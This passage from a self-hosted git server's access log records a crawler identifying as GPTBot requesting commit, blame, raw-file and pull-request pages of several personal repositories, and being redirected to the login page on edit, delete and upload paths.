AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13094] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook" [Client 74.7.227.38] [Length 10524] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:16:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" +[17/Feb/2026:16:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" +[17/Feb/2026:16:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11567] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" +[17/Feb/2026:16:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 13360] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 13393] [Gzip 6.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:16:08:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/.Notebook" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/.Notebook" +[17/Feb/2026:16:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 12328] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:08:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook" +[17/Feb/2026:16:08:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook" +[17/Feb/2026:16:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:16:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" +[17/Feb/2026:16:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11569] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" +[17/Feb/2026:16:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" +[17/Feb/2026:16:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" +[17/Feb/2026:16:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 13018] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:16:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 1658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 10036] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:16:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:08:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:08:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:16:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" 